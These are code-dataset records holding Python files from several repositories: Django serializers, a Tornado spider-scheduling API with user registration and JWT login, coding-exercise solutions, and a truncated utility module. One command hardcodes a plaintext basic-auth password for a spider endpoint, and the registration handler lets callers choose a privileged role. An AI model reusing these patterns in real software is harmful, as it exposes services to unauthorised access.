+{"seq_id":"14775415384","text":"from rest_framework import serializers\n\nfrom . models import (\n Customer,\n Gender,\n Category,\n Size,\n Color,\n CouponOrder,\n CouponItem,\n Item,\n ItemVariation,\n OrderItem,\n Order,\n Payment,\n Address\n)\n\nclass CustomerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Customer\n fields = [\n 'id','name','last_name',\n 'email','phone_number',\n 'customer_cookie_id',\n ]\n\n\nclass GenderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Gender\n fields = ['id','gender']\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ['id','name','gender']\n\n\nclass SizeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Size\n fields = ['id','size']\n\nclass ColorSerializer(serializers.ModelSerializer):\n class Meta:\n model = Color\n fields = ['id','color']\n\n\nclass CouponOrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = CouponOrder\n fields = ['id','code','percentage']\n\n\nclass CouponItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = CouponItem\n fields = ['id','code','percentage']\n\n\nclass ItemSerializer(serializers.ModelSerializer):\n category_name = serializers.ReadOnlyField(source='category.name')\n gender = serializers.ReadOnlyField(source='category.gender.gender')\n class Meta:\n model = Item\n fields = [\n 'id','name','price',\n 'discount_price',\n 'gender',\n 'category',\n 'category_name',\n 'label',\n 'description',\n 'imageURL1','imageURL2',\n 'imageURL3','imageURL4',\n ]\n\n\nclass ItemVariationSerializer(serializers.ModelSerializer):\n color_name = serializers.ReadOnlyField(source='color.color')\n size_name = serializers.ReadOnlyField(source='size.size')\n class Meta:\n model = ItemVariation\n fields = [\n 'id','item',\n 'size','color',\n 'stock',\n 'color_name',\n 'size_name',\n ]\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n size = serializers.ReadOnlyField(source='item_variation.size.size')\n color = serializers.ReadOnlyField(source='item_variation.color.name')\n name = serializers.ReadOnlyField(source='item_variation.item.name')\n imgURL = serializers.ReadOnlyField(source='item_variation.item.imageURL1')\n class Meta:\n model = OrderItem\n fields = [\n 'id','customer',\n 'ordered','coupon',\n 'item_variation',\n 'size','color',\n 'name','quantity',\n 'total','imgURL',\n ]\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n coupon_code = serializers.ReadOnlyField(source='coupon.code')\n coupon_percentage = serializers.ReadOnlyField(source='coupon.percentage')\n class Meta:\n model = Order\n fields = [\n 'id','customer',\n 'ref_code','order_items',\n 'ordered','coupon',\n 'coupon_code',\n 'coupon_percentage',\n 'being_delivered',\n 'received','total',\n 'shipping_address',\n 'billing_address'\n ]\n\n\nclass PaymentSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = [\n 'id','order',\n 'customer','amount',\n 'total_installment',\n 'installments',\n 'total_amount',\n 'timestamp',\n ]\n\n\nclass AddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = Address\n fields = [\n 'id','street_name',\n 'street_number',\n 'floor','apartment',\n ]\n","repo_name":"vijo95/e-commerce_back","sub_path":"core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"6900897721","text":"import requests\nimport time\nimport logging\nfrom applications.github.models import Repository\nfrom django.core.management import BaseCommand\n\n\nlogger = logging.getLogger('django')\n\nspider_url = \"https://spider.dapprank.com/schedule.json\"\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n for row in Repository.objects.all():\n data = {\n \"project\": \"muon\",\n \"spider\": \"repos\",\n \"repos_id\": row.id,\n \"url\": row.html_url,\n }\n\n res = requests.post(spider_url, data=data, auth=('spider', 'spider1@#'))\n if res.status_code == 200:\n print(res.json())\n else:\n logger.error(res.text)\n # print(res.text)\n time.sleep(3)\n","repo_name":"Bit03/gluon","sub_path":"applications/github/management/commands/running_repo_spider.py","file_name":"running_repo_spider.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"38925517072","text":"from numpy import zeros\r\n\r\ndef interwoven(str1, str2, target):\r\n if len(target) == 0:\r\n return True\r\n elif str1[0] == str2[0] == target[0]:\r\n return interwoven(str1[1:], str2, target[1:]) or interwoven(str1, str2[1:], target[1:])\r\n elif str1[0] == target[0]:\r\n return interwoven(str1[1:], str2, target[1:])\r\n elif str2[0] == target[0]:\r\n return interwoven(str1, str2[1:], target[1:])\r\n else:\r\n return False\r\nfile = open('test.txt')\r\ninput_lines = file.readlines()\r\ntarget = input_lines[0].rstrip()\r\nlines = [x.rstrip() for x in input_lines[1:]]\r\n\r\n # Initialize the zero matrix.\r\nM = zeros((len(lines), len(lines)), dtype=int)\r\n\r\n# Run through all combinations of dna strings.\r\nfor i in range(len(lines)):\r\n for j in range(len(lines)):\r\n if i <= j:\r\n # Count the combined number of each type of nucleotide in given dna strands.\r\n current_profile = [(lines[i] + lines[j]).count(nuc) for nuc in \"ACGT\"]\r\n # Compare the current profile to each substring of the same length in the superstring.\r\n for index in range(len(target) - len(lines[i]) - len(lines[j]) + 1):\r\n # Having an identical profile is a necessary condition in order to be interweavable, but less computationally intensive.\r\n if current_profile == [target[index:index + len(lines[i]) + len(lines[j])].count(nuc)\r\n for nuc in \"ACGT\"]:\r\n # Check the interweave if the profiles match, add an extra character outside the alphabet to avoid index out of range errors.\r\n if interwoven(lines[i] + '$', lines[j] + '$',\r\n target[index:index + len(lines[i]) + len(lines[j])]):\r\n M[i][j] = 1\r\n break\r\n # The comparison are symmetric, so we've already done these computations.\r\n else:\r\n M[i][j] = M[j][i]\r\n\r\nfor s in M:\r\n print(*s)\r\n","repo_name":"gromdimon/Bioinformatics_Stronghold","sub_path":"62. Finding Disjoint Motifs in a Gene.py","file_name":"62. Finding Disjoint Motifs in a Gene.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"1949551794","text":"import ast\nimport logging\nfrom time import time\nfrom tornado.web import RequestHandler\nfrom apscheduler.jobstores.base import JobLookupError\nfrom .forms import *\nfrom .parts import *\nfrom .bases import RestfulHandler\nfrom .executor.distribute import execute_task\nfrom model import Projects, Schedulers, Records\nfrom settings import schedulers, SECRET, ALGORITHM\n\n\n\"\"\"\n @apiDefine Operations\n @apiParam {Number} [limit=LIMIT_DEFAULT] Optional Limit with default LIMIT_DEFAULT.\n @apiParam {String} [ordering='id'] Optional Ordering default 'id'.\n @apiParam {Number} [offset=OFFSET_DEFAULT] Optional Limit with default OFFSET_DEFAULT.\n @apiParam {String} [fieldname] filter field.\n\"\"\"\n\"\"\"\n @apiDefine ErrorExamples\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'failed of parameters validator'}\n\"\"\"\n\n\nclass IndexHandler(RestfulHandler):\n\n # @authorization\n # async def get(self, *args, **kwargs):\n # sec = int(self.request.arguments.get('sec')[0])\n # schedulers.add_job(traversal_queue, 'interval', seconds=sec, max_instances=10)\n\n # async def get(self, *args, **kwargs):\n # print('this is index handler')\n # data = await get_spider_list('arts', '1550036771')\n # logging.warning(data)\n permission = 'observer'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Index-get\n @apiPermission Observer\n @api {get} /\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\n \"first name\": \"John\",\n \"last name\": \"Doe\"\n }\n \"\"\"\n jobs = get_current_jobs(schedulers.get_jobs())\n response = dict(count=len(jobs))\n response['result'] = jobs\n await self.over(data=response)\n\n\nclass ProjectsHandler(RestfulHandler):\n\n permission = 'developer'\n storage = FileStorage()\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Projects-get\n @apiPermission Developer\n @api {get} /projects/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'id': 1, 'project': 'arts', 'spiders': 'keeper, facts, hydra',\n 'version': 1560326985623, 'ssp': false, 'number': 3,\n 'filename': 'arts_1560326985623.egg, 'creator': 'username',\n 'create': 2019-02-22 10:00:00}\n \"\"\"\n arguments = ProjectsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await Projects.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'project': i.project, 'spiders': i.spiders,\n 'version': i.version, 'ssp': i.ssp, 'number': i.number,\n 'filename': i.filename, 'creator': i.creator,\n 'create': i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n async def post(self, *args, **kwargs):\n \"\"\"\n @apiGroup Projects-post\n @apiPermission Developer\n @api {post} /projects/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {String} project Project name.\n @apiParam {Bool} ssp Is ssp.\n @apiParam {File} eggs egg file.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'spider': spiders, 'number': number, 'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'failed of parameters validator'}\n \"\"\"\n arguments = ProjectsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n token = self.request.headers.get('Authorization')\n username = get_username(token)\n project = arguments.project.data\n ssp = arguments.ssp.data\n spiders = project\n number = 1\n eggs = self.request.files.get('eggs')\n version = str(round(time()))\n if not all([eggs, project, version]):\n return await self.interrupt(400, 'missing parameters')\n egg = eggs.pop()\n filename = egg['filename']\n if not filename.endswith('.egg'):\n return await self.interrupt(400, 'file is not egg')\n filename = await self.storage.put(egg['body'], project, version)\n if not ssp:\n gross = await get_spider_list(project, version)\n spiders = ','.join(gross)\n number = len(gross)\n await Projects.create(project=project, spiders=spiders, version=version,\n ssp=ssp, number=number, filename=filename, creator=username,\n create_time=datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n await self.over(201, {'spider': spiders, 'number': number, 'message': 'successful'})\n\n async def delete(self, *args, **kwargs):\n \"\"\"\n @apiGroup Projects-delete\n @apiPermission Developer\n @api {delete} /projects/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {Int} id project id of databases.\n @apiParam {String} project Project name.\n @apiParam {Int} version project version.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'project': project, 'version': version, 'message': 'successful'}\n @apiUse ErrorExamples\n \"\"\"\n arguments = ProjectsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n pid = arguments.id.data\n project = arguments.project.data\n version = arguments.version.data\n query = await Projects.filter(Q(id=pid) & Q(project=project) & Q(version=version))\n if query:\n try:\n await Projects.filter(id=pid).delete()\n result = self.storage.delete(self.storage.makepath(project, version))\n if result:\n return await self.over(200, {'project': project, 'version': version, 'message': 'successful'})\n except Exception as error:\n logging.warning(error)\n await self.over(400, {'project': project, 'version': version, 'message': 'failed'})\n\n\nclass SchedulersHandler(RestfulHandler):\n permission = 'developer'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-get\n @apiPermission Developer\n @api {get} /Schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 2,\n \"current\": {'id': 1, 'jid': 'p3fd0909803032nm', 'func': 'executor.rider'\n 'project': 'arts', 'spider': 'fact',\n 'version': 1563206963652, 'ssp': 1, 'job': 25fd-09098f-2032-dfs20,\n 'mode': 'date, 'timer': {'run_date': '2019-03-10'}, 'status': 1,\n 'creator': 'username'},\n \"result\": {'id': 1, 'jid': 'p3fd0909803032nm', 'project': 'arts', 'spider': 'fact',\n 'version': 1563206963652, 'ssp': 1, 'job': 25fd-09098f-2032-dfs20,\n 'mode': 'date, 'timer': {'run_date': '2019-03-10'}, 'status': 1,\n 'creator': 'username', 'create': 2019-02-22 10:00:00}\n }\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await Schedulers.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['current'] = get_current_jobs(schedulers.get_jobs())\n response['results'] = [\n {'id': i.id, 'jid': i.jid, 'project': i.project, 'spider': i.spider,\n 'version': i.version, 'ssp': i.ssp, 'job': i.job,\n 'mode': i.mode, 'timer': i.timer, 'status': i.status,\n 'creator': i.creator, 'create_time': i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n async def post(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-post\n @apiPermission Developer\n @api {post} /schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {String} project Project name.\n @apiParam {Int} version Project version.\n @apiParam {String} spider Spider name.\n @apiParam {Bool} ssp Is ssp.\n @apiParam {Bool} status Is is effective.\n @apiParam {String} mode 'date' or 'interval' or 'cron.\n @apiParam {Dict} timer {'seconds': 5} or {'run_date': '2019-02-20 18:00:00'}.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'project': project, 'version': version, 'status': status, 'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'failed of parameters validator'}\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n token = self.request.headers.get('Authorization')\n project = arguments.project.data\n version = arguments.version.data\n spider = arguments.spider.data\n ssp = arguments.ssp.data\n mode = arguments.mode.data\n username = get_username(token)\n # mode is interval, value {'seconds': 5}\n # mode is date, value {'run_date': '2019-02-13 17:05:05'}\n # mode is cron, value {'day_of_week': 'mon-fri', 'hour': 5, 'minute': 30, 'end_date': '2014-05-30'}\n try:\n timer = ast.literal_eval(arguments.timer.data)\n except Exception as error:\n logging.warning(error)\n return await self.interrupt(400, 'error of timer')\n if not isinstance(timer, dict):\n return await self.interrupt(400, 'error of timer')\n status = arguments.status.data\n jid = str(uuid1()) # scheduler job id, can remove job\n\n if status:\n schedulers.add_job(execute_task, mode, trigger_args=timer, id=jid,\n args=[project, spider, version, ssp, mode,\n arguments.timer.data, username, status])\n await Schedulers.create(project=project, spider=spider, version=version,\n ssp=ssp, mode=mode, timer=arguments.timer.data,\n creator=username, status=status, jid=jid,\n create_time=datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n await self.over(201, {'project': project, 'version': version, 'status': status, 'message': 'successful'})\n\n async def put(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-put\n @apiPermission Developer\n @api {put} /schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {Int} Id From databases.\n @apiParam {Bool} status Is is effective.\n @apiParam {String} mode 'date' or 'interval' or 'cron.\n @apiParam {Dict} timer {'seconds': 5} or {'run_date': '2019-02-20 18:00:00'}.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'project': query.project, 'version': query.version, 'status': status, 'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'This scheduler dose not exist'}\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n token = self.request.headers.get('Authorization')\n sid = arguments.id.data\n mode = arguments.mode.data\n username = get_username(token)\n status = arguments.status.data\n try:\n timer = ast.literal_eval(arguments.timer.data)\n except Exception as error:\n logging.warning(error)\n return await self.interrupt(400, 'error of timer')\n query = await Schedulers.filter(id=sid).first()\n if not query:\n return await self.interrupt(400, 'This scheduler dose not exist')\n try:\n if query.status and not status: # cancel task according to status\n schedulers.remove_job(query.jid)\n if status and not query.status: # add task according to status\n schedulers.add_job(execute_task, mode,\n trigger_args=timer, id=query.jid,\n args=[query.project, query.spider, query.version, mode, timer, username, status])\n if status and status == query.status: # update task according to status\n schedulers.reschedule_job(query.jid, trigger=mode, trigger_args=timer)\n await Schedulers.filter(id=sid).update(mode=mode, timer=arguments.timer.data,\n creator=username, status=status)\n except JobLookupError as error:\n logging.warning(error)\n await Schedulers.filter(id=sid).delete()\n return await self.interrupt(reason='No job by the id of {jid} was found.'\n 'This may be because the timer has expired, not a fatal error.'\n 'The corresponding scheduler will be delete.'\n 'Don\\'t worry.'.format(jid=query.jid))\n await self.over(data={'project': query.project, 'version': query.version, 'status': status, 'message': 'successful'})\n\n async def delete(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-delete\n @apiPermission Developer\n @api {delete} /schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {Int} id project id of databases.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'id': 1, 'project': 'arts, 'spider': 'fact',\n 'version': 1563020120320, 'jid': '120fd50fsd50fd80sdf', 'mode': 'interval',\n 'timer': '{'seconds': 5}', 'message': 'successful'}\n @apiUse ErrorExamples\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n sid = arguments.id.data\n query = await Schedulers.filter(id=sid).first()\n if not query:\n return await self.interrupt(400, 'This scheduler dose not exist')\n try:\n schedulers.remove_job(query.jid)\n except JobLookupError as error:\n logging.warning(error)\n await Schedulers.filter(id=sid).delete()\n response = {'id': query.id, 'project': query.project, 'spider': query.spider,\n 'version': query.version, 'jid': query.jid, 'mode': query.mode,\n 'timer': query.timer, 'message': 'successful'}\n await self.over(200, response)\n\n\nclass RecordsHandler(RestfulHandler):\n permission = 'developer'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Records-get\n @apiPermission Developer\n @api {get} /records/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 5,\n \"results\":{'id': 1, 'project': 'arts', 'spider': 'fact',\n 'version': 1563206963652, 'ssp': 1, 'job': 25fd-09098f-2032-dfs20,\n 'mode': 'date, 'timer': {'run_date': '2019-03-10'}, 'status': 1,\n 'start': 2019-03-10 18:00:00, 'end': 2019-03-10 18:00:20,\n 'period': '0-days 20 seconds',\n 'creator': 'username', 'create': 2019-02-22 10:00:00}\n }\n @apiUse ErrorExamples\n \"\"\"\n arguments = RecordsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await Records.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'project': i.project, 'spider': i.spider,\n 'version': i.version, 'ssp': i.ssp, 'job': i.job,\n 'mode': i.mode, 'timer': i.timer, 'status': i.status,\n 'start': i.start, 'end': i.end, 'period': i.period,\n 'creator': i.creator, 'create': i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n\nclass OperationLogHandler(RestfulHandler):\n permission = 'superuser'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup OperationLog-get\n @apiPermission Developer\n @api {get} /operations/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 5,\n \"results\":{'id': 1, 'operator': 'username', 'interface': 'projects',\n 'method': 'GET', 'status_code': 400, 'hostname': 'Mac book',\n 'args': '{'project': 'arts'}', 'address': 127.0.0.1, 'create': 2019-02-22 10:00:00}\n }\n @apiUse ErrorExamples\n \"\"\"\n arguments = OperationLogForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await OperationLog.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'operator': i.operator, 'interface': i.interface,\n 'method': i.method, 'status_code': i.status_code, 'hostname': i.hostname,\n 'args': i.args, 'address': i.address, 'create': i.operation_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n\nclass RegisterHandler(RestfulHandler):\n\n async def post(self):\n \"\"\"\n @apiGroup Register-put\n @api {put} /reg/\n @apiParam {String} username username.\n @apiParam {String} password password.\n @apiParam {String} email email.\n @apiParam {String} role 'observer' or 'developer' or 'superuser'.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'message': 'welcome:{username} '.format(username=username)}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'superuser is exist'}\n \"\"\"\n arguments = UserForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n username = arguments.username.data\n email = arguments.email.data\n role = arguments.role.data\n password = arguments.password.data\n pwd = str_to_hash(password)\n code = random_characters(n=6)\n if role == 'superuser':\n superuser_exits = await User.filter(role='superuser').count()\n if superuser_exits:\n return await self.interrupt(400, 'superuser is exist')\n res = await User.filter(Q(username=username) | Q(email=email))\n if res:\n return await self.interrupt(400, 'username or email is exist')\n await User.create(username=username, password=pwd, email=email, code=code, role=role)\n await self.over(201, {'message': 'welcome:{username} '.format(username=username)})\n\n\nclass LoginHandler(RestfulHandler):\n\n async def post(self, *args, **kwargs):\n \"\"\"\n @apiGroup Login-post\n @api {put} /login/\n @apiParam {String} username username.\n @apiParam {String} password password.\n @apiParam {String} [code] verify code(superuser do not need code).\n\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'id': 1, 'username': user.username, 'token': 'fda14afw.4f6afd8.fa4fdfa.fdw5f'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'verify code error'}\n \"\"\"\n arguments = LoginForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n username = arguments.username.data\n pwd = str_to_hash(arguments.password.data)\n code = arguments.code.data\n user = await User.filter(Q(username=username) & Q(password=pwd)).first()\n if not user:\n return await self.interrupt(400, 'username or password error')\n payload = {'id': user.id, 'username': user.username, 'exp': datetime.utcnow()}\n token = jwt.encode(payload, SECRET, ALGORITHM).decode('utf8')\n if user.role == 'superuser' or user.verify and user.status:\n return await self.over(data={'id': user.id, 'username': user.username, 'token': token})\n superuser = await User.filter(role='superuser').first()\n if user.status and not user.verify:\n res = await User.filter(Q(username=username) & Q(password=pwd) & Q(code=code)).first()\n if res:\n await User.filter(Q(username=username) & Q(password=pwd) & Q(code=code)).update(verify=True)\n return await self.over(data={'id': user.id, 'username': user.username, 'token': token})\n else:\n return await self.interrupt(400,\n 'verify code error, '\n 'please contact the superuser:{username}(email:{email})'\n .format(username=superuser.username, email=superuser.email))\n return await self.interrupt(400,\n 'user status is false,'\n 'please contact the superuser:{username}(email:{email})'\n .format(username=superuser.username, email=superuser.email))\n\n\nclass UserHandler(RestfulHandler):\n permission = 'superuser'\n\n async def get(self):\n \"\"\"\n @apiGroup User-get\n @apiPermission Superuser\n @api {get} /user/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 5,\n \"results\":{'id': 1, 'username': 'username', 'status': true,\n 'verify': true, 'code': 'flower', 'create_time': 2019-02-22 10:00:00}\n }\n @apiUse ErrorExamples\n \"\"\"\n arguments = UserForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await User.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'username': i.username, 'status': i.status,\n 'verify': i.verify, 'code': i.code, 'create': i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n async def put(self, *args, **kwargs):\n \"\"\"\n @apiGroup User-put\n @apiPermission Superuser\n @api {put} /user/\n @apiParam {Int} id user id.\n @apiParam {String} [password] password.\n @apiParam {Bool} [status] status.\n @apiParam {String} [email] email.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'user dose not exist'}\n \"\"\"\n arguments = LoginForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n uid = arguments.id.data\n password = str_to_hash(arguments.password.data) if len(arguments.password.data) > 5 else None\n status = arguments.status.data\n email = arguments.email.data\n query = await User.filter(id=uid).first()\n if not query:\n return await self.interrupt(400, 'user dose not exist')\n params = {}\n if all([email, len(email) > 5, email != query.email]):\n params['email'] = email\n if password != query.password and password:\n params['password'] = password\n if all([status, isinstance(status, bool), status != query.status]):\n params['status'] = status\n await User.filter(id=uid).update(**params)\n await self.over(data={'message': 'successful'})\n\n async def delete(self, *args, **kwargs):\n \"\"\"\n @apiGroup User-delete\n @apiPermission Superuser\n @api {put} /user/\n @apiParam {Int} id user id.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'user dose not exist'}\n \"\"\"\n arguments = LoginForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n user_id = arguments.id.data\n query = await User.filter(id=user_id).first()\n if not query:\n return await self.interrupt(400, 'user dose not exist')\n await User.filter(id=user_id).delete()\n await self.over(200, {'message': 'successful'})\n\n\n","repo_name":"asyncspider/AsyncSpiderweb","sub_path":"AsyncSpiderweb/component/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":26323,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"22225736259","text":"# 날짜 세기\n\nT = int(input())\n\nfor t in range(1, T + 1):\n\n calender = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n dict_day = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\n\n first_Month, first_Day, second_Month, second_Day = map(int, input().split())\n days = 0\n\n if first_Month + 1 < second_Month:\n months = calender[first_Month : second_Month - 1] # months between two days\n \n for month in months: # days in those months\n days += dict_day[month]\n \n # days in Second Month\n days += second_Day\n\n # days in First Month\n first_month_days = dict_day[first_Month] - first_Day + 1\n days += first_month_days\n\n elif first_Month + 1 == second_Month: # there is no month between two days\n \n days += second_Day\n\n first_month_days = dict_day[first_Month] - first_Day + 1\n days += first_month_days\n\n else:\n days += second_Day - first_Day + 1\n\n print(f'#{t} {days}')\n\n","repo_name":"seoul-ssafy-class-2-studyclub/heecheol","sub_path":"SWEA/d2/날짜 계산기.py","file_name":"날짜 계산기.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"2064928662","text":"from datetime import date\r\nfrom dateutil.parser import parse\r\nimport datetime\r\nfrom unidecode import unidecode\r\n\r\nfrom math import log\r\nimport hashlib\r\nimport os\r\nimport argparse\r\n\r\ndef __timeconversion(timein):\r\n strs = timein.split(':')\r\n if len(strs)==3:\r\n timeout = strs[0] + ':' + strs[1] + \":00\" #ignore second\r\n else:\r\n timeout = timein\r\n return timeout\r\n\r\ndef convertDate_1(startDate, startTime):\r\n dateappointed = startDate + \" \" + startTime\r\n try:\r\n dateconverted = parse(dateappointed) \r\n except ValueError:\r\n msg = \"Error: Incorrect date format not in MM/DD/YYYY: '\" + dateappointed + \"'\"\r\n dateconverted = dateappointed\r\n\r\n return dateconverted\r\n\r\ndef __convertDateFormat(fieldValue):\r\n DATE_FORMAT = \"%Y-%m-%d\" \r\n TIME_FORMAT = \"%H:%M:%S\"\r\n\r\n if isinstance(fieldValue, datetime.date):\r\n fieldValueOut = fieldValue.strftime(DATE_FORMAT)\r\n elif isinstance(fieldValue, datetime.time):\r\n fieldValueOut = fieldValue.strftime(TIME_FORMAT)\r\n elif isinstance(fieldValue, datetime.datetime):\r\n fieldValueOut = fieldValue.strftime(\"%s %s\" % (DATE_FORMAT, TIME_FORMAT))\r\n else:\r\n fieldValueOut = fieldValue\r\n \r\n return fieldValueOut\r\n\r\ndef toInt(valueIn):\r\n if valueIn is None:\r\n valueOut = 0\r\n else:\r\n try:\r\n valueOut = int(valueIn)\r\n except:\r\n valueOut = 0\r\n return valueOut\r\n\r\ndef toString(itemIn):\r\n return toStringPython2(itemIn)\r\n \r\n if itemIn is None:\r\n itemOut = ' '\r\n else:\r\n if type(itemIn) == str:\r\n itemOut = str(itemIn)\r\n else:\r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n itemOut = unidecode(itemIn)\r\n return itemOut.strip()\r\n\r\n\r\ndef toStringPython2(itemIn):\r\n if itemIn is None:\r\n itemOut = ' '\r\n return itemOut\r\n \r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n strtype = type(itemIn)\r\n if strtype == unicode: \r\n itemOut = itemIn.encode(\"utf-8\")\r\n itemOut = str(itemOut)\r\n else:\r\n itemOut = unidecode(itemIn)\r\n \r\n return itemOut.strip()\r\n \r\ndef toStringPython3(itemIn):\r\n if itemIn is None:\r\n itemOut = ' '\r\n return itemOut\r\n \r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n itemOut = unidecode(itemIn)\r\n return itemOut.strip()\r\n\r\ndef toBinary(valueIn):\r\n if valueIn is None:\r\n valueOut = False\r\n elif 